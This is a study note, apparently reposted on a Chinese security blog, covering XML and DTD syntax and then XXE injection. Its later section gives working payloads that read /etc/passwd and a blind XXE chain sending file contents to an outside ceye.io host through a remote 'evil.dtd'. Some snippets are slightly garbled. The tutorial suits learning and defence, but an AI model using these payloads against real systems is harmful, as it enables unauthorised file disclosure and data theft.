了解XML

admin
admin
admin
138674
文章
114
评论
2024年12月24日13:33:15评论4 views字数 4541阅读15分8秒阅读模式

目录

  1. Simple note:
    1. XML
    2. DTD
  2. Try
  3. DIG
    1. Normal XXE
    2. Blind XXE with ceye.io:
    3. XML in PHP:
  4. Reference

Learn:http://www.w3school.com.cn/xml/xml_intro.asp

Simple note:

XML

A simple example of XML:

1
2
3
4
5
6
7
8
9
10
11
12
13
 
<?xml version="1.0" encoding="ISO-8859-1 ?>
<skate>
<people  grade="four">
<name>azhu</name>
<high> three board </high>
</people>
<people  grade="one">
<name>threezhi</name>
<high> three board </high>
</people>
</skate>

`<!-- You should avoid use attribute of XML. -->`

In XML, there are five predefined entity reference(实体引用):

1
2
3
4
5
 
<<
>>
&&
&apos;'
""

A example of load an XML document to XML parser(解释器) :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
 

<script>
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}else{
// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}

xmlhttp.open("GET","note.xml",false);
xmlhttp.send();
xmlDoc=xmlhttp.responseXML;

document.getElementById("to").innerHTML=xmlDoc.getElementsByTagName("to")[0].childNodes[0].nodeValue;
document.getElementById("from").innerHTML=xmlDoc.getElementsByTagName("from")[0].childNodes[0].nodeValue;
document.getElementById("message").innerHTML=xmlDoc.getElementsByTagName("body")[0].childNodes[0].nodeValue;

</script>

DTD

A example about DTD in XML:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
 
<?xml version="1.0" encoding="ISO-8859-1 ?>

<!DOCTYPE skate[
<!ELEMENT people (name, high)>
<!ELEMENT name (#PCDATA)> 
<!ELEMENT high (#PCDATA)> 
]>

<skate>
<people  grade="four">
<name>azhu</name>
<high> three board </high>
</people>
<people  grade="one">
<name>threezhi</name>
<high> three board </high>
</people>
</skate>

External document declaration:

<!DOCTYPE skate SYSTEM "file_path">

PCDATA means parsed character data. The tags in the text will be handled as a flag and the entity will be expand.

CDATA means character data and it will not be expand.

In DTD , declare an element and a attribute.:

1
2
3
4
5
6
7
8
9
10
11
12
 
<!ELEMENT Element_name category>
<!ELEMENT Element_name (content)>
<!ELEMENT Element_name (Elemnt1, Element2...)>

Empty Element:
<!ELEMENT Element_name, EMPTY>

An element who just have PCDATA should use #PCDATA to declare.

<!ATTLIST name type category defaults>
<!ATTLIST payment type CDATA "check">

DTD - Entity(实体):

A entity declare:

Internal entity:

1
2
3
4
5
6
7
8
9
 

DTD:
<!ENTITY name "value">
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">

XML:
<author>&writer;&copyright;</author>

External entity:

1
2
3
4
5
6
 
DTD:
<!ENTITY writer SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">
<!ENTITY copyright SYSTEM "http://www.w3school.com.cn/dtd/entities.dtd">

XML:
<author>&writer;&copyright;</author>

Parameter entity:

1
2
 
<!ENTITY %entity_name "value">
<!ENTITY %entity_name SYSTEM "URL">

Try

This is a internal entity:

1
2
3
4
5
6
7
8
9
 
<?xml version="1.0" encoding="ISO-8859-1" ?>

<!DOCTYPE note[
<!ELEMENT note (name)> 
<!ENTITY fuck "You">
]>
<note>
<name>&fuck;</name>
</note>

I don’t know why that I can’t build a xml within external entity successfully. So I wanan put it away in this time.

DIG

When there is a post , it made up by xml. And the parameter can be control. Mybe there hava a XXE vluntery.

We can use some simple xml to test it.

1
2
3
4
5
6
 
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test[
<!ENTITY foo "Testing">
]>

<parameter>&foo;</parameter>

If it return “Testing”. We can use another to get more information.

Normal XXE

1
2
3
4
5
 
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "file:///etc/passwd">
]>
<c>&test;</c>

Parameter entity:

1
2
3
4
5
 
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY % test SYSTEM "file:///etc/passwd">
%test;
]>

If the website return nothing , There is another mean to deal with this problem.

Use external entity:

XML:

1
2
3
4
5
 
<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY test SYSTEM "http://127.0.0.1/shell.dtd">
]>
<c>&test;</c>

DTD:

1
 
<!ENTITY foo SYSTEM "file:///etc/passwd">

Blind XXE with ceye.io:

1
2
3
4
5
 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>

We can create a dtd to get echo result(回显结果).

XML:

1
2
3
4
5
6
7
 
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a [
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://*.*.*.*:8080/xml/evil.dtd">
%dtd;
%send;
]>

DTD:

1
2
3
4
 
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all 
"<!ENTITY % send SYSTEM 'http://ip.port.b182oj.ceye.io/?xml1=%payload;'>"
>%all;

If the XEE is exist, ceye will get a GET request.

Of course there are many means to get important and private information. But due to my ability, I wanna put it down to learn more important things.

XML in PHP:

1
2
3
4
 
<?php
$xml=simplexml_load_file("note.xml");
print_r($xml);
?>

Reference

- By:threezh1.com

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月24日13:33:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   了解XMLhttps://cn-sec.com/archives/3547535.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息